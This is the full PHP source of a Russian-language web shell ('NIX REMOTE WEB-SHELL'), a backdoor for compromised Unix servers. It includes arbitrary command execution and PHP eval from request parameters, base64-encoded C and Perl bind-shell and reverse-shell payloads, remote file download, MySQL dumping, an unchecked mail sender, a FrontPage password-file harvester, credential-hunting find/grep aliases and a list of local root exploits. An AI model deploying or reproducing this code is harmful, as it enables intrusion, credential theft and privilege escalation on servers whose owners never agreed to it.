NIX REMOTE WEB-SHELL v.1.0

Â àäìèíêó

[ Âïåðåä ] *.NIX REMOTE WEB-SHELL v.1.0 Stable [ Íàçàä ][ Î ñêðèïòå ]
[ Èíôîðìàöèÿ î ñèñòåìå ][ Íàâèãàöèÿ ][ Óñòàíîâêà áåêäîðà ][ PHP-êîä ][ Çàãðóçêà ôàéëîâ ][ Èñïîëíåíèå êîìàíä ]
[ MySQL ][ Îòïðàâêà ïèñüìà ][ Ìàèëôëóäåð ][ Èíñòðóìåíòû ][ Äåìîíû ][ Àëüòåðíàòèâíûå ìåòîäû ][ /root ][ Óäàëèòü øåëë ]

'ls -la;pwd;uname -a', 'ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñî suid-áèòîì' => 'find / -type f -perm -04000 -ls', 'ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñî sgid-áèòîì' => 'find / -type f -perm -02000 -ls', 'ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñî sgid-áèòîì' => 'find . -type f -perm -02000 -ls', 'ïîèñê íà ñåðâåðå ôàéëîâ config' => 'find / -type f -name "config*"', 'ïîèñê íà ñåðâåðå ôàéëîâ admin' => 'find / -type f -name "admin*"', 'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config' => 'find . -type f -name "config*"', 'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ pass' => 'find . -type f -name "pass*"', 'ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ, îòêðûòûõ äëÿ çàïèñè' => 'find / -perm -2 -ls', 'ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ, îòêðûòûõ äëÿ çàïèñè' => 'find . -perm -2 -ls', 'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd' => 'find . -type f -name service.pwd', 'ïîèñê íà ñåðâåðå ôàéëîâ service.pwd' => 'find / -type f -name service.pwd', 'ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd' => 'find / -type f -name .htpasswd', 'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd' => 'find . -type f -name .htpasswd', 'ïîèñê âñåõ ôàéëîâ .bash_history' => 'find / -type f -name .bash_history', 'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history' => 'find . -type f -name .bash_history', 'ïîèñê âñåõ ôàéëîâ .fetchmailrc' => 'find / -type f -name .fetchmailrc', 'ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc' => 'find . -type f -name .fetchmailrc', 'âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs' => 'lsattr -va', 'ïðîñìîòð îòêðûòûõ ïîðòîâ' => 'netstat -an | grep -i listen', 'ïîèñê âñåõ php-ôàéëîâ ñî ñëîâîì password' =>'find / -name *.php | xargs grep -li password', 'ïîèñê ïàïîê ñ ìîäîì 777' =>'find / -type d -perm 0777', 'Îïðåäåëåíèå âåðñèè ÎÑ' =>'sysctl -a | grep version', 'Îïðåäåëåíèå âåðñèè ÿäðà' =>'cat /proc/version', 'Ïðîñìîòð syslog.conf' =>'cat /etc/syslog.conf', 'Ïðîñìîòð Message of the day' =>'cat /etc/motd', 'Ïðîñìîòð hosts' =>'cat /etc/hosts', 'Âåðñèÿ äèñòðèáóòèâà 1' =>'cat /etc/issue.net', 'Âåðñèÿ äèñòðèáóòèâà 2' =>'cat /etc/*-realise', 'Ïîêàçàòü âñå ïðîöåñû' =>'ps auxw', 'Ïðîöåññû òåêóùåãî ïîëüçîâàòåëÿ' =>'ps ux', 'Ïîèñê httpd.conf' =>'locate httpd.conf'); /* Port bind source */ $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5 jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5 ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW5 0IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnV mWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0 KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyh hdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0F OWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2N rZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2F kZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB 7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHV wMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ 6IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyh hcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2J pbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGN sb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW5 0ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVudGVyZWQpO2krKykgDQp7DQppZih lbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID0 9ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCk pDQpyZXR1cm4gMDsNCn0="; $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZi AoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2 NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORV QsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQ pzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZH JfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw 0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCm FjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaW YgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+Jk NPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0 9OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpleGl0IDA7DQp9DQp9"; $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0 KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10 pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJ ybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2l uLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA 9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMSt zdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVB QUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4 sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCg pIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1 zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWN sKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; if(isset($uploadphp)) { $socket=fsockopen($iphost,$loadport); //connect fputs($socket,"GET $loadfile HTTP/1.0\nHOST:cd\n\n"); //request while(fgets($socket,31337)!="\r\n" && !feof($socket)) { unset($buffer); } while(!feof($socket)) $buffer.=fread($socket, 1024); $file_size=strlen($buffer); $f=fopen($loadnewname,"wb+"); fwrite($f, $buffer, $file_size); echo "Ðàçìåð çàãðóæåííîãî ôàéëà: $file_size

" ; } if (!empty($_GET['ac'])) {$ac = $_GET['ac'];} elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];} else {$ac = "navigation";} switch($ac) { // Shell case "shell": echo ""; /* command execute */ if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -lad"; } if (($_POST['alias']) AND ($_POST['alias']!=="")) { foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;} } } echo "Âûïîëíåííàÿ êîìàíäà: ".$_POST['cmd'].""; echo ""; echo "
"; echo "".passthru($_POST['cmd']).""; echo "
"; echo ""; ?> :: Âûïîëíåíèå êîìàíä íà ñåðâåðå ::
| cd | | cat | echo | wget | rm | mysqldump | who | ps -ax | cp | pwd | perl | gcc | locate | find | ls -lad | "; echo "Âûïîëíèòü êîìàíäó"; echo "
"; echo "Ðàáî÷àÿ äèðåêòîðèÿ "; if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo ""; } else { echo ""; } echo ""; echo ""; /* aliases form */ echo "
"; echo ""; echo " Âûáåðèòå àëèàñ "; echo ""; if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo ""; } else { echo ""; } echo " "; echo ""; echo "
"; break; case "art": echo "FrontPage Exploit by Nitrex
Ýêñïëîéò äëÿ FrontPage. Ñîáèðàåò ÷èòàåìûå .htpassword ôàéëû ïî âñåìó ñåðâåðó. Ïîçâîëÿåò ñîçäàòü íåõèëóþ áàçó âñåõ ñàéòîâ â âèäå ëîãèí:ïàðîëü îò õîñòåðà, òî åñòü ïàðîëè ê FrontPage ïîäõîäÿò ê FTP è äðóãèì ñåðâèñàì ñåðâåðà. Ðàññøèôðîâêà ïðîèçâîäèòñÿ ñ ïîìîùüþ John The Ripper (Standart/DES).

MySQL Find Config Exploit by DreAmeRz
Ýêñïëîèò, ïîçâîëÿþùèé îáëåã÷èòü ïîèñê ïàðîëåé ê áàçå äàííûõ. Ïðîèçâîäèòñÿ ïîèñê ôàéëîâ ñ óïîìèíàíèåì ðÿäà ñòðîê, óêàçûâàþùèõ íà êîííåêò ê MySQL. Òàêæå âîçìîæíî ñîâïàäåíèå ïàðîëåé ñ äðóãèìè ñåðâèñàìè ñåðâåðà. Ïàðîëè â áîëüøåíñòâå ñëó÷àåâ èëè âîâñå íå çàøèôðîâàíû, èëè çàøèôðîâàíû îáðàòèìûì àëãîðèòìîì. Ïðîàíàëèçèðîâàâ ôàéëû, óêàçàííûå ýêñïëîèòîì, âû áûñòðî íàéäåòå ïàðîëü ê MySQL.

FTP Brut by xoce
Ïîëíîöåííûé áðóòôîðñåð, ðàáîòàþùèé ïî ìåòîäó ïîäñòàíîâêè ïàðîëåé, êîòîðûå áåðåò èç ôàéëà. Ôàéë ãåíåðèðóåòñÿ ñàì, âû òîëüêî óêàçûâàåòå ÷èñëî ïàðîëåé è... âñå - ïåðåáîð íà÷èíàåòñÿ!!! Ñ ïîìîùüþ äàííîãî áðóòôîðñåðà âû ñìîæåòå ïîäîáðàòü ïàðîëü ê ëþáîìó õîñòèíãó áåç ïðîáëåì! ×òîáû áûëî ÷òî ïåðåáèðàòü, áûëà äîáàâëåíà áàçà ïàðîëåé, êîòîðàÿ ãåíåðèðóåòñÿ íà ëåòó (íå ïèøèòå áîëüøèå öèôðû â êîëè÷åñòâå ïàðîëåé, òàê êàê ýòî ñåðüåçíàÿ íàãðóçêà íà ñåðâåð! 10000 âïîëíå õâàòèò).

FTP login:login Brut by Terabyte
Ýêñïëîèò ïîçâîëÿåò ïåðåáðàòü àêêàóíò íà FTP íà ñâÿçêó login:login. ×åì áîëüøå þçåðîâ â /etc/passwd, òåì áîëüøå âåðîÿòíîñòü óäà÷íîé ðàáîòû ýêñïëîèòà.

Íåêîòîðûå äðóãèå ìèíè-ýêñïëîèòû ïðèâåäåíû çäåñü â àëüÿñàõ.
"; break; case "frontpage": $p=getenv("DOCUMENT_ROOT"); if(exec("cat /etc/passwd")){ $ex=explode("/", $p); $do_login=substr($p,0,strpos($p,$ex[2])); $next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2])); exec("cat /etc/passwd", $passwd); for($i=0; $i<=count($passwd); $i++) { $xz=explode(":", $passwd[$i]); $file="/".$do_login.$xz[0].$next_login."/_vti_pvt/service.pwd"; if(exec("cat ".$file)){ exec("cat ".$file,$open); $a=$open[count($open)-1]; $fr=strpos($a, ":"); $open1=substr($a, $fr); if($xz[4]=='') { $file1="/".$do_login.$xz[0].$next_login."/_vti_pvt/.htaccess"; Unset($domain); exec("cat ".$file1,$domain); $domain1=explode(" ",$domain[8]); $xz[4]=$domain1[1]; } echo $xz[0].$open1.":".$xz[2].":".$xz[3].":".$xz[4].":".$xz[5].":".$xz[6]."
"; } } } elseif(is_file("/etc/passwd")){ $ex=explode("/", $p); $passwd="/etc/passwd"; echo "Ïóòü: ".$p."
"; $do_login=substr($p,0,strpos($p,$ex[2])); $next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2])); if(is_file($passwd)) { $open=fopen($passwd,"r"); while (!feof($open)) { $str=fgets($open, 100); $mas=explode(":", $str); $file="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/service.pwd"; if(is_file($file)) { echo $mas[0]; $open1=fopen($file, "r"); $str1=fread($open1,filesize($file)); fclose($open1); $fr=strpos($str1, ":"); $str2=substr($str1, $fr); $str2=rtrim($str2); // if($mas[4]=='') { $file1="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/.htaccess"; $open2=fopen($file1,"r"); $domain=fread($open2,filesize($file1)); fclose($open2); $domain1=substr($domain,106,110); $domain2=explode("AuthUserFile",$domain1); $mas[4]=$domain2[0]; } // echo $str2.":".$mas[2].":".$mas[3].":".$mas[4].":".$mas[5].":".$mas[6]."
"; } } fclose($open); } } else{ echo "Ñ ïàññîì îáëîì :((("; } break; case "dbexploit": echo "
"; echo "Â ôàéëå ïðèñóòñòâóåò ôóíêöèÿ mysql_connect:
"; exec("find / -name *.php | xargs grep -li mysql_connect"); exec("find / -name *.inc | xargs grep -li mysql_connect"); exec("find / -name *.inc.php | xargs grep -li mysql_connect"); echo "Â ôàéëå ïðèñóòñòâóåò ôóíêöèÿ mysql_select_db:
"; exec("find / -name *.php | xargs grep -li mysql_select_db"); exec("find / -name *.inc | xargs grep -li mysql_select_db"); exec("find / -name *.inc.php | xargs grep -li mysql_select_db"); echo "Â ôàéëå ïðèñóòñòâóåò óïîìèíàíèå ïàðîëÿ:
"; exec("find / -name *.php | xargs grep -li $password"); exec("find / -name *.inc | xargs grep -li $password"); exec("find / -name *.inc.php | xargs grep -li $password"); exec("find / -name *.php | xargs grep -li $pass"); exec("find / -name *.inc | xargs grep -li $pass"); exec("find / -name *.inc.php | xargs grep -li $pass"); echo "Â ôàéëå ïðèñóòñòâóåò ñëîâî localhost:
"; exec("find / -name *.php | xargs grep -li localhost"); exec("find / -name *.inc | xargs grep -li localhost"); exec("find / -name *.inc.php | xargs grep -li localhost"); echo "
"; break; // ñïèñîê ïðîöåññîâ case "ps": echo "Ïðîöåññû â ñèñòåìå:
"; echo "
"; if ($pid) { if (!$sig) {$sig = 9;} echo "Îòïðàâëåíèå êîìàíäû ".$sig." to #".$pid."... "; $ret = posix_kill($pid,$sig); if ($ret) {echo "Âñå, ïðîöåññ óáèò, àìèíü";} else {echo "ÎØÈÁÊÀ! ".htmlspecialchars($sig).", â ïðîöåññå #".htmlspecialchars($pid).".";} } $ret = `ps -aux`; if (!$ret) {echo "Íåâîçìîæíî îòîáðàçèòü ñïèñîê ïðîöåññîâ! Âèäíî, çëîé àäìèí çàïðåòèë ps";} else { $ret = htmlspecialchars($ret); while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} $stack = explode("\n",$ret); $head = explode(" ",$stack[0]); unset($stack[0]); if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;} if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;} $k = $ps_aux_sort[0]; if ($ps_aux_sort[1] != "a") {$y = "";} else {$y = "";} for($i=0;$i".$head[$i]."";} } $prcs = array(); foreach ($stack as $line) { if (!empty($line)) { echo ""; $line = explode(" ",$line); $line[10] = join(" ",array_slice($line,10,count($line))); $line = array_slice($line,0,11); $line[] = "KILL"; $prcs[] = $line; echo ""; } } $head[$k] = "".$head[$k]."".$y; $head[] = "ACTION"; $v = $ps_aux_sort[0]; usort($prcs,"tabsort"); if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);} $tab = array(); $tab[] = $head; $tab = array_merge($tab,$prcs); echo ""; foreach($tab as $k) { echo ""; foreach($k as $v) {echo "";} echo ""; } echo "
".$v."
"; } break; // exploits for root... case "exploits": // thanks to xoce $public_site = "http://hackru.info/adm/exploits/public_exploits"; $private_site = "http://hackru.info/adm/exploits/private_exploits"; echo"Ýòîò ðàçäåë ñîçäàí ïî ðÿäó ïðè÷èí. Âî-ïåðâûõ, óæå íàäîåëî èñêàòü îäíè è òåæå ýêñïëîèòû, âî-âòîðûõ - êîìïèëèðîâàíèå è èñïðàâëåíèå ñîðöîâ ïîä êîíêðåòíóþ ïëàòôîðìó óæå òîæå íå ïðèíîñèò óäîâîëüñòâèÿ. Âñå ýêñïëîèòû ñêîìïèëèðîâàíû è íàñòðîåíû. Ñàìîìó êîìïèëèðîâàòü áûëî âëîì, ïîýòîìó âîñïîëüçîâàëñÿ ãîòîâûìè :) Âûðàæàþ áëàãîäàðíîñòü xoce (hackru.info)

Local ROOT for linux 2.6.20 - mremap (./m)
Local ROOT for linux 2.6.20 - ptrace (./p)
BRK - Local Root Unix 2.4.*(./brk)
Traceroute v1.4a5 exploit by sorbo (./sortrace)
Local Root Unix 2.4.* (./root)
Sendmail 8.11.x exploit localroot (./sxp)
Local Root Unix 2.4.* (./ptrace_kmod)
Local Root Unix 2.4.* (./mr1_a)

"; echo "Èñïîëüçîâàíèå: çàõîäèòå â /tmp èç bash øåëëà è çàïóñêàéòå ôàéëû çàïóñêà.
Ïðèìåð: cd /tmp; ./m - âñå, ýêñïëîèò çàïóñòèòñÿ, è åñëè âñå ok, òî âû ïîëó÷èòå ïðàâà root'a!
Åñëè çäåñü íå îêàçàëîñü ïîäõîäÿùåãî ýêñïëîèòà, òî ïîñåòèòå www.web-hack.ru/exploits/ è security.nnov.ru."; break; case "damp": if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){ $db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']); if($db) { if(@mysql_select_db($_POST['mysql_db'],$db)) { // èíôà î äàìïå $sql1 = "# MySQL dump created by NRWS\r\n"; $sql1 .= "# homepage: http://www.Ru24-Team.NET\r\n"; $sql1 .= "# ---------------------------------\r\n"; $sql1 .= "# date : ".date ("j F Y g:i")."\r\n"; $sql1 .= "# database : ".$_POST['mysql_db']."\r\n"; $sql1 .= "# table : ".$_POST['mysql_tbl']."\r\n"; $sql1 .= "# ---------------------------------\r\n\r\n"; // ïîëó÷àåì òåêñò çàïðîñà ñîçäàíèÿ ñòðóêòóðû òàáëèöû $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db); $row = @mysql_fetch_row($res); $sql1 .= $row[1]."\r\n\r\n"; $sql1 .= "# ---------------------------------\r\n\r\n"; $sql2 = ''; // ïîëó÷àåì äàííûå òàáëèöû $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db); if (@mysql_num_rows($res) > 0) { while ($row = @mysql_fetch_assoc($res)) { $keys = @implode("`, `", @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) {$values[$k] = addslashes($v);} $values = @implode("', '", $values); $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n"; } $sql2 .= "\r\n# ---------------------------------"; } echo "Ãîòîâî! Äàìï ïðîøåë óäà÷íî!"; // ïèøåì â ôàéë èëè âûâîäèì â áðàóçåð if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } else { echo $sql1.$sql2; } } // end if(@mysql_select_db($_POST['mysql_db'],$db)) else echo "Òàêîé ÁÄ íåò!"; @mysql_close($db); } // end if($db) else echo "Íåò êîííåêòà c ñåðâåðîì!"; } // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){ else if(!empty($_POST['dif'])&&!$fp) { echo "ÎØÈÁÊÀ, íåò ïðàâ çàïèñè â ôàéë!"; } break; // SQL Attack case "sql": echo "
"; echo " Áàçà: "; echo " Òàáëèöà: "; echo " Ëîãèí: "; echo " Ïàðîëü: "; echo ""; echo ""; echo "
Ñîõðàíèòü äàìï â ôàéëå: "; echo "" ; echo ""; echo "
"; print ""; ### @$php_self=$_GET['PHP_SELF']; @$from=$_GET['from']; @$to=$_GET['to']; @$adress=$_POST['adress']; @$port=$_POST['port']; @$login=$_POST['login']; @$pass=$_POST['pass']; @$adress=$_GET['adress']; @$port=$_GET['port']; @$login=$_GET['login']; @$pass=$_GET['pass']; if(!isset($adress)){$adress="localhost";} if(!isset($login)){$login="root";} if(!isset($pass)){$pass="";} if(!isset($port)){$port="3306";} if(!isset($from)){$from=0;} if(!isset($to)){$to=50;} ?>

Õîñò:

Ïîðò:

Ëîãèí:

Ïàðîëü:

PHP v".@phpversion()."
mySQL v".@mysql_get_server_info()."
";}?>

Âûéòè èç áàçû";}else{$status="Îòêëþ÷åí.";} print "Ñòàòóñ: $status

"; print "
"; print "[Òàáëèöû]
"; $res = mysql_list_dbs($serv); while ($str=mysql_fetch_row($res)){ print "$str[0]
"; @$tc++; } $pro=" "; @$base=$_GET['base']; @$db=$_GET['db']; print "[Âñåãî òàáëèö: $tc]
$pro"; if($base){ print "
Òàáëèöà: [$tbl]

"; $result=mysql_list_tables($db); while($str=mysql_fetch_array($result)){ $c=mysql_query ("SELECT COUNT(*) FROM $str[0]"); $records=mysql_fetch_array($c); print "[$records[0]] $str[0]
"; mysql_free_result($c); } } #end base @$vn=$_GET['vn']; print " "; print "Áàçà äàííûõ: $db => $vn"; @$inside=$_GET['inside']; @$tbl=$_GET['tbl']; if($inside){ print ""; mysql_select_db($db) or die(mysql_error()); $c=mysql_query ("SELECT COUNT(*) FROM $tbl"); $cfa=mysql_fetch_array($c); mysql_free_result($c); print "
"; print " Âñåãî: $cfa[0] Îò: Äî: [Çàãðóçèòü] "; @$vn=$_GET['vn']; @$from=$_GET['from']; @$to=$_GET['to']; @$from=$_GET['from']; @$to=$_GET['to']; if(!isset($from)){$from=0;} if(!isset($to)){$to=50;} $query = "SELECT * FROM $vn LIMIT $from,$to"; $result = mysql_query($query); for ($i=0;$i "; } print ""; while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){ print ""; foreach ($mn as $come=>$lee) { $nst_inside=htmlspecialchars($lee); print "\r\n"; } print ""; } mysql_free_result($result); print "
$name
$nst_inside
"; } #end inside print "
"; } # end $conn ### end of sql print "
"; print $copyr; die; break; //PHP Eval Code execution case "eval": echo <<Èñïîëíåíèå php-êîäà (áåç "< ? ? >") $tend HTML; if (isset($_POST['ephp'])){ eval($_POST['ephp']); } break; // SEND MAIL case "sendmail": echo <<Îò êîãî:

Êîìó:

Òåìà:

Òåêñò:
$tend HTML; // íèêàêàÿ ïðîâåðêà íå äåëàåòñÿ, à çà÷åì ? =) if (isset($submit)) { mail($tomailz,$mailtema,$mailtext,"From: $frommail"); echo "

Ñîîáùåíèå îòïðàâëåíî!

"; } break; // Èíôîðìàöèÿ î ñèñòåìå case "info": if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = true; $hsafemode = "Âêëþ÷åíî"; } else {$safemode = false; $hsafemode = "Îòêëþ÷åíî";} /* display information */ echo "[ Èíôîðìàöèÿ î ñèñòåìå ]
"; echo "Õîñò: ".$_SERVER["HTTP_HOST"]."
" ; echo "IP ñåðâåðà: ".gethostbyname($_SERVER["HTTP_HOST"])."
"; echo " Ñåðâåð: ".$_SERVER['SERVER_SIGNATURE']." "; echo "OC: ".exec("uname -a")."("; print "".php_uname()." )
\n"; echo "Ïðîöåññîð: ".exec("cat /proc/cpuinfo | grep GHz")."
"; echo "Ïðèâèëåãèè: ".exec("id")."
"; echo "Âñåãî ìåñòà: " . (int)(disk_total_space(getcwd())/(1024*1024)) . " MB " . "Ñâîáîäíî: " . (int)(disk_free_space(getcwd())/(1024*1024)) . " MB
"; echo "Òåêóùèé êàòàëîã:".exec("pwd").""; echo "
Òåêóøèé web-ïóòü: ".@$_SERVER['PHP_SELF']." "; echo "
Òâîé IP: ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")
"; echo "PHP version: ".phpversion()."
"; echo " ID âëàäåëüöà ïðîöåñà: ".get_current_user()."
"; echo "MySQL : ".mysql_get_server_info()."
"; if(file_exists('/etc/passwd') && is_readable('/etc/passwd')){ print 'Åñòü äîñòóï ê /etc/passwd!
'; } if(file_exists('/etc/shadow') && is_readable('/etc/shadow')){ print 'Åñòü äîñòóï ê /etc/shadow!
'; } if(file_exists('/etc/shadow-') && is_readable('/etc/shadow-')){ print 'Åñòü äîñòóï ê /etc/shadow-! '; } if(file_exists('/etc/master.passwd') && is_readable('/etc/master.passwd')){ print 'Åñòü äîñòóï ê /etc/master.passwd!
'; } if(isset($_POST['th']) && $_POST['th']!=''){ chdir($_POST['th']); }; if(is_writable('/tmp/')){ $fp=fopen('/tmp/qq8',"w+"); fclose($fp); print "/tmp - îòêðûòà
\n"; unlink('/tmp/qq8'); } else{ print "/tmp - íå îòêðûòà
"; } echo "Áåçîïàñíûé ðåæèì: ".$hsafemode."
"; if ($nixpasswd) { if ($nixpasswd == 1) {$nixpasswd = 0;} $num = $nixpasswd + $nixpwdperpage; echo "*nix /etc/passwd:
"; $i = $nixpasswd; while ($i < $num) { $uid = posix_getpwuid($i); if ($uid) {echo join(":",$uid)."
";} $i++; } } else {echo "
Get /etc/passwd
";} if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
